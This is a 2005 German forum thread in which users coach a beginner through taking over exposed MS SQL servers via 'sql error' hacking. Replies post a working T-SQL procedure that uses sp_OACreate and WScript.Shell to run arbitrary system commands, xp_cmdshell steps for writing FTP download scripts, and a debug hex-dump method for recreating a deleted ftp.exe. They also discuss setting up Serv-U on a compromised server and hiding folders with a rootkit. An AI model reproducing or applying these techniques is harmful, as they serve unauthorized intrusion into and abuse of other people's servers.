sql-errorz hacken

Dieses Thema im Forum "Sicherheit & Datenschutz" wurde erstellt von n00b123, 27. September 2005 .

Schlagworte:
Status des Themas:
Es sind keine weiteren Antworten möglich.
  1. #1 27. September 2005
    hi all,
    könnt mir einer helfen beim hacken von sqlz mit sql_error
    ged auch per icq oder pn
    10er ist sicher
    danke
     
  4. #2 28. September 2005
    erst mal, gibt es verschiedene Arten des Errors, ihr müsst wissen woran es liegt!
    Habt ihr keine rechte auf der shell? Fehlt die Xplog70 oder Odsole70.dll? Is die shell gelöscht?
    Ihr müst wissen woher euer Fehler kommt um ihn zu fixen, so bringt es wenig wenn die xplog70.dll weg is ne neue shell zu erstellen^^
    Und falls irh ekiene rechte auch der master shell habt wirds sowieso schwer! Auch mit dem erstellen ner neuen Shell!

    Auf dein Prob zurück zu kommen! Wenn du ne neue shell erstellt hast musst du weiter mit sqlbrower arbeiten und net mit sqlexec oder so, da sqlexec auf die xp_cmdshell zugriefen will auf der du aber keine rechte hast! also musst du mit Sqlbrower auf deine neue shell zugreifen und so diene befehle ausführen!

    Gruss Sypher
     
  5. #3 28. September 2005
    letz get pro^^


    1.) xp_cmdshell adden mit addproc xp cmdshell oder so
    2.) mit nem script ...
    raw sql qry

    Code:
    CREATE PROCEDURE ok_test(@cmd varchar(255), @Wait int = 0) AS
--Create WScript.Shell object
DECLARE @result int, @OLEResult int, @RunResult int
DECLARE @ShellID int

EXECUTE @OLEResult = sp_OACreate 'WScript.Shell', @ShellID OUT
IF @OLEResult <> 0 SELECT @result = @OLEResult
IF @OLEResult <> 0 RAISERROR ('CreateObject %0X', 14, 1, @OLEResult)


EXECUTE @OLEResult = sp_OAMethod @ShellID, 'Run', Null, @cmd, 0, @Wait
IF @OLEResult <> 0 SELECT @result = @OLEResult
IF @OLEResult <> 0 RAISERROR ('Run %0X', 14, 1, @OLEResult)
--If @OLEResult <> 0 EXEC sp_displayoaerrorinfo @ShellID, @OLEResult


EXECUTE @OLEResult = sp_OADestroy @ShellID

return @result
    3.) saying "hello" to mssql sever^^
    4.) mir scan geben...habe noch div.undokumentierte methoden
     
  6. #4 28. September 2005
    hmm...

    Also, ich ha jetzt mit sqlbrower eine shell erstellt.

    Wie nun weiter ?

    xp_cmdshell "echo open .............>>c:\...........txt"

    so dann die dateien holen ?

    Muss ich jede zeile wieder einzelnd eingeben wie bei sqlexec ?
     
  7. #5 28. September 2005
    markant erkannt
     
  8. #6 28. September 2005
    ok, aber wie weiß ich jetzt ob der befehl geklappt hat und wie starte ich dann serv-u ???
     
  9. #7 29. September 2005
    hm wenn du das nocht weißt fang an tuts zu lesen!

    Gruss Sypher
     
  10. #8 29. September 2005
    das mach ich schon ne ewigkeit, nur finde ich hier kein tut, dass mir den vorgang beschreibt, hier steht zwar drin wie ich die shell herstelle, aber wie es dann wirklich weitergeht, hab ich nicht gefunden.
     
  11. #9 29. September 2005
    du musst die befehle nacheinander eingeben .. kriegst dann meißt ne meldung sql no data oder sowas .. am ende führste die eigegebenen befehle aus und dann merkste schon obs gefunzt hat oder nicht ^^ aber das kann kurz dauewrn .. weil er ja oft files downloaden muss .. also einfach dann kurz abwarten ...

    die befehle selber stehn ja in den tuts und serv - u starten ^^ da kann man doch net viel falsch machen .. ich glaub echt du solltest das tut mal genau lesen gibt 2 oder 3 gute hier im board ...
     
  12. #10 29. September 2005
    mit sqlexec ist das ja alle kein porblem, nur geht es ja gerade um sqlbrowser bzw. sql errors hacken, und da gehen ja Befehle wie dir c:\ nicht, deshalb weis ich nicht, ob es geklappt hat.

    Und wie erstellt ich die gelöschten Daten wie die ftp.exe ?
     
  13. #11 29. September 2005
    ECHO @ECHO OFF^>1>ftp.bat
    ECHO echo e 0100 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00^>^>1>>ftp.bat
    ECHO echo e 0110 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00^>^>1>>ftp.bat
    ECHO echo e 0120 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00^>^>1>>ftp.bat
    ECHO echo e 0130 00 00 00 00 00 00 00 00 00 00 00 00 D0 00 00 00^>^>1>>ftp.bat
    ..........
    .....
    .....
    ...
    ich glaube aber kaum, dass du 1000 zeilen mit solchen code wirklich ausführen willst nur um die ftp.exe wieder herzustellen.
     
  14. #12 29. September 2005
    ich glaub ich hab jetzt nen geeigneten server gefunden, secured hab ich ihn auch, nur noch ne Frage...

    Kann ich auf dem FTP auch Ordner verstecken ?

    EDIT: OK, es geht nur mit rootkit...
     

  15. Videos zum Thema
    Video Script
Die Seite wird geladen...

Ähnliche Themen mit den Stichworten: sql errorz hacken

  1. Gutschy
    Wer knackt mein MySQL Passwort? Also den HASH Wert.
    Gutschy, 25. November 2018 , im Forum: Security Tools & Programme
    Antworten:
    2
    Aufrufe:
    755
    Gutschy
    25. November 2018
  2. eSo
    PHP/mySQL: DB Stuktur / Mehrere User
    eSo, 24. August 2018 , im Forum: Webentwicklung
    Antworten:
    0
    Aufrufe:
    4.434
    eSo
    24. August 2018
  3. KingLui
    Ubuntu Maria DB > MYSQL Dienst stoppt sporadisch
    KingLui, 12. April 2017 , im Forum: Linux & BSD
    Antworten:
    3
    Aufrufe:
    2.590
    raid-rush
    12. April 2017
  4. newyork
    Strukturierte Textdatei in PHP auslesen und via SQL in eine Datenbank schreiben
    newyork, 2. Dezember 2016 , im Forum: Programmierung & Entwicklung
    Antworten:
    3
    Aufrufe:
    8.060
    McDevil1988
    29. April 2017
  5. eSo
    VB .NET - SQL Query an Variable übergeben
    eSo, 20. April 2016 , im Forum: Programmierung & Entwicklung
    Antworten:
    3
    Aufrufe:
    1.424
    eSo
    24. April 2016